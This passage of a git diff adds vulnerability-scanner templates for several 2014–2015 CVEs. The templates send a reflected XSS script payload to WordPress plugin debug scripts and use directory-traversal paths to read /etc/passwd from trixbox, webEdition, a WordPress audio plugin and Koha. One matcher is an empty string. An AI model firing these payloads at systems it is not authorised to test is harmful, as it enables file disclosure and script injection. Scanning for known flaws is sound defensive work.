+ - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4561
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '">'
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml
new file mode 100644
index 0000000000..6473d1c69d
--- /dev/null
+++ b/cves/2014/CVE-2014-4592.yaml
@@ -0,0 +1,31 @@
+id: CVE-2014-4592
+
+info:
+ name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4592
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-5111.yml b/cves/2014/CVE-2014-5111.yml
new file mode 100644
index 0000000000..f525a4441f
--- /dev/null
+++ b/cves/2014/CVE-2014-5111.yml
@@ -0,0 +1,27 @@
+id: CVE-2014-5111
+
+info:
+ name: Fonality trixbox - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
+ reference: |
+ - https://www.exploit-db.com/exploits/39351
+ - https://www.cvedetails.com/cve/CVE-2014-5111
+ tags: cve,cve2014,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2014/CVE-2014-5258.yml b/cves/2014/CVE-2014-5258.yml
new file mode 100644
index 0000000000..3bbaec6a5e
--- /dev/null
+++ b/cves/2014/CVE-2014-5258.yml
@@ -0,0 +1,27 @@
+id: CVE-2014-5258
+
+info:
+ name: webEdition 6.3.8.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/34761
+ - https://www.cvedetails.com/cve/CVE-2014-5258
+ tags: cve,cve2014,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2015/CVE-2015-4414.yml b/cves/2015/CVE-2015-4414.yml
new file mode 100644
index 0000000000..765e2d69dd
--- /dev/null
+++ b/cves/2015/CVE-2015-4414.yml
@@ -0,0 +1,27 @@
+id: CVE-2015-4414
+
+info:
+ name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/37274
+ - https://www.cvedetails.com/cve/CVE-2015-4414
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2015/CVE-2015-4632.yml b/cves/2015/CVE-2015-4632.yml
new file mode 100644
index 0000000000..9c3123e887
--- /dev/null
+++ b/cves/2015/CVE-2015-4632.yml
@@ -0,0 +1,27 @@
+id: CVE-2015-4632
+
+info:
+ name: Koha 3.20.1 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
+ reference: |
+ - https://www.exploit-db.com/exploits/37388
+ - https://www.cvedetails.com/cve/CVE-2015-4632
+ tags: cve,cve2015,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file